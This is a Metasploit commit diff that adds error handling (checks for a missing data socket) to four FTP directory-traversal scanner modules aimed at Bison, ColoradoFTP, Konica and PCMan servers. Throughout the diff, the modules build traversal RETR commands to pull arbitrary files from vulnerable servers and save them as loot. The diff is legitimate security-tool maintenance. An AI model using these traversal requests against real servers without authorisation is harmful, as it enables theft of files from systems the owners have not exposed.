Merge pull request rapid7#7697 from h00die/fix_colorado

jinq102030 · web-flow · commit 378d8aea3672 · 2016-12-16T13:51:15.000-06:00
Fix ftp traversal error conditions
diff --git a/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb b/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb
@@ -61,32 +61,49 @@ def run_host(target_host)
       connect_login
       sock = data_connect
 
-      file_path = datastore['PATH']
-      file = ::File.basename(file_path)
-
-      # make RETR request and store server response message...
-      retr_cmd = ( "..//" * datastore['DEPTH'] ) + "#{file_path}"
-      res = send_cmd( ["RETR", retr_cmd])
-
-      # read the file data from the socket that we opened
-      response_data = sock.read(1024)
-
-      unless response_data
-        print_error("#{file} not found")
-        return
+      # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb
+      # and  #7582
+      if sock.nil?
+        error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'
+        print_status(error_msg)
+        elog(error_msg)
+      else
+        file_path = datastore['PATH']
+        file = ::File.basename(file_path)
+
+        # make RETR request and store server response message...
+        retr_cmd = ( "..//" * datastore['DEPTH'] ) + "#{file_path}"
+        res = send_cmd( ["RETR", retr_cmd])
+
+        # read the file data from the socket that we opened
+        # dont assume theres still a sock to read from. Per #7582
+        if sock.nil?
+          error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'
+          print_status(error_msg)
+          elog(error_msg)
+          return
+        else
+          # read the file data from the socket that we opened
+          response_data = sock.read(1024)
+        end
+
+        unless response_data
+          print_error("#{file} not found")
+          return
+        end
+
+        if response_data.length == 0
+          print_status("File (#{file_path})from #{peer} is empty...")
+          return
+        end
+
+        # store file data to loot
+        loot_file = store_loot("bisonware.ftp.data", "text", rhost, response_data, file, file_path)
+        vprint_status("Data returned:\n")
+        vprint_line(response_data)
+        print_good("Stored #{file_path} to #{loot_file}")
       end
 
-      if response_data.length == 0
-        print_status("File (#{file_path})from #{peer} is empty...")
-        return
-      end
-
-      # store file data to loot
-      loot_file = store_loot("bisonware.ftp.data", "text", rhost, response_data, file, file_path)
-      vprint_status("Data returned:\n")
-      vprint_line(response_data)
-      print_good("Stored #{file_path} to #{loot_file}")
-
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
       vprint_error(e.message)
       elog("#{e.class} #{e.message} #{e.backtrace * "\n"}")
diff --git a/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.rb b/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.rb
@@ -64,31 +64,48 @@ def run_host(ip)
       connect_login
       sock = data_connect
 
-      file_path = datastore['PATH']
-      file = ::File.basename(file_path)
-
-      # make RETR request and store server response message...
-      retr_cmd = '\\\\\\' + ("..\\" * datastore['DEPTH'] ) + "#{file_path}"
-      res = send_cmd( ["retr", retr_cmd], true)
-      print_status(res)
-      # read the file data from the socket that we opened
-      response_data = sock.read(1024)
-
-      unless response_data
-        print_error("#{file} not found")
-        return
-      end
+      # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb
+      # and  #7582
+      if sock.nil?
+        error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'
+        print_status(error_msg)
+        elog(error_msg)
+      else
+        file_path = datastore['PATH']
+        file = ::File.basename(file_path)
 
-      if response_data.length == 0
-        print_status("File (#{file_path})from #{peer} is empty...")
-        return
-      end
+        # make RETR request and store server response message...
+        retr_cmd = '\\\\\\' + ("..\\" * datastore['DEPTH'] ) + "#{file_path}"
+        res = send_cmd( ["retr", retr_cmd], true)
+        print_status(res)
+
+        # dont assume theres still a sock to read from. Per #7582
+        if sock.nil?
+          error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'
+          print_status(error_msg)
+          elog(error_msg)
+          return
+        else
+          # read the file data from the socket that we opened
+          response_data = sock.read(1024)
+        end
 
-      # store file data to loot
-      loot_file = store_loot("coloradoftp.ftp.data", "text", rhost, response_data, file, file_path)
-      vprint_status("Data returned:\n")
-      vprint_line(response_data)
-      print_good("Stored #{file_path} to #{loot_file}")
+        unless response_data
+          print_error("#{file} not found")
+          return
+        end
+
+        if response_data.length == 0
+          print_status("File (#{file_path})from #{peer} is empty...")
+          return
+        end
+
+        # store file data to loot
+        loot_file = store_loot("coloradoftp.ftp.data", "text", rhost, response_data, file, file_path)
+        vprint_status("Data returned:\n")
+        vprint_line(response_data)
+        print_good("Stored #{file_path} to #{loot_file}")
+      end
 
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
       vprint_error(e.message)
diff --git a/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb b/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb
@@ -62,31 +62,46 @@ def run_host(target_host)
       # Login anonymously and open the socket that we'll use for data retrieval.
       connect_login
       sock = data_connect
-      file_path = datastore['PATH']
-      file = ::File.basename(file_path)
+      if sock.nil?
+        error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'
+        print_status(error_msg)
+        elog(error_msg)
+      else
+        file_path = datastore['PATH']
+        file = ::File.basename(file_path)
 
-      # make RETR request and store server response message...
-      retr_cmd = ( "..//" * datastore['DEPTH'] ) + "#{file_path}"
-      res = send_cmd( ["RETR", retr_cmd])
+        # make RETR request and store server response message...
+        retr_cmd = ( "..//" * datastore['DEPTH'] ) + "#{file_path}"
+        res = send_cmd( ["RETR", retr_cmd])
 
-      # read the file data from the socket that we opened
-      response_data = sock.read(1024)
+        # read the file data from the socket that we opened
+        # dont assume theres still a sock to read from. Per #7582
+        if sock.nil?
+          error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'
+          print_status(error_msg)
+          elog(error_msg)
+          return
+        else
+          # read the file data from the socket that we opened
+          response_data = sock.read(1024)
+        end
 
-      unless response_data
-        print_error("#{file_path} not found")
-        return
-      end
+        unless response_data
+          print_error("#{file_path} not found")
+          return
+        end
 
-      if response_data.length == 0 or ! (res =~ /^150/ )
-        print_status("File (#{file_path})from #{peer} is empty...")
-        return
-      end
+        if response_data.length == 0 or ! (res =~ /^150/ )
+          print_status("File (#{file_path})from #{peer} is empty...")
+          return
+        end
 
-      # store file data to loot
-      loot_file = store_loot("konica.ftp.data", "text", rhost, response_data, file, file_path)
-      vprint_status("Data returned:\n")
-      vprint_line(response_data)
-      print_good("Stored #{file_path} to #{loot_file}")
+        # store file data to loot
+        loot_file = store_loot("konica.ftp.data", "text", rhost, response_data, file, file_path)
+        vprint_status("Data returned:\n")
+        vprint_line(response_data)
+        print_good("Stored #{file_path} to #{loot_file}")
+      end
 
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
       vprint_error(e.message)
diff --git a/modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb b/modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb
@@ -60,31 +60,46 @@ def run_host(target_host)
       # Login anonymously and open the socket that we'll use for data retrieval.
       connect_login
       sock = data_connect
-      file_path = datastore['PATH']
-      file = ::File.basename(file_path)
+      if sock.nil?
+        error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'
+        print_status(error_msg)
+        elog(error_msg)
+      else
+        file_path = datastore['PATH']
+        file = ::File.basename(file_path)
 
-      # make RETR request and store server response message...
-      retr_cmd = ( "..//" * datastore['DEPTH'] ) + "#{file_path}"
-      res = send_cmd( ["RETR", retr_cmd])
+        # make RETR request and store server response message...
+        retr_cmd = ( "..//" * datastore['DEPTH'] ) + "#{file_path}"
+        res = send_cmd( ["RETR", retr_cmd])
 
-      # read the file data from the socket that we opened
-      response_data = sock.read(1024)
+        # read the file data from the socket that we opened
+        # dont assume theres still a sock to read from. Per #7582
+        if sock.nil?
+          error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'
+          print_status(error_msg)
+          elog(error_msg)
+          return
+        else
+          # read the file data from the socket that we opened
+          response_data = sock.read(1024)
+        end
 
-      unless response_data
-        print_error("#{file_path} not found")
-        return
-      end
+        unless response_data
+          print_error("#{file_path} not found")
+          return
+        end
 
-      if response_data.length == 0 or ! (res =~ /^150/ )
-        print_status("File (#{file_path})from #{peer} is empty...")
-        return
-      end
+        if response_data.length == 0 or ! (res =~ /^150/ )
+          print_status("File (#{file_path})from #{peer} is empty...")
+          return
+        end
 
-      # store file data to loot
-      loot_file = store_loot("pcman.ftp.data", "text", rhost, response_data, file, file_path)
-      vprint_status("Data returned:\n")
-      vprint_line(response_data)
-      print_good("Stored #{file_path} to #{loot_file}")
+        # store file data to loot
+        loot_file = store_loot("pcman.ftp.data", "text", rhost, response_data, file, file_path)
+        vprint_status("Data returned:\n")
+        vprint_line(response_data)
+        print_good("Stored #{file_path} to #{loot_file}")
+      end
 
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
       vprint_error(e.message)
